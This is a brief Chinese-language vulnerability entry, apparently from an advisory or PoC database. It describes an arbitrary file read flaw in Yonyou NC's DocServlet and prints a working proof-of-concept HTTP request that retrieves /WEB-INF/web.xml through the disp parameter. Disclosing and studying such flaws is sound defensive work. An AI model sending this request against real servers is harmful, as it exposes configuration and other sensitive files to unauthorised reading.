用友nc DocServlet 任意文件读取

日期: 2023-11-10 | 影响软件: 用友NC | POC: 已公开

漏洞描述

用友NC是一种企业级ERP软件,提供全面的财务、采购、库存、销售、生产等管理模块,以及人力资源与薪资、客户关系管理等辅助功能。用友NC可支持多个行业的企业,如制造业、零售业、服务业等。攻击者可以通过该漏洞读取服务器文件。

PoC代码

GET /servlet/~webrt/nc.uap.lfw.file.action.DocServlet?disp=/WEB-INF/web.xml HTTP/1.1

相关漏洞推荐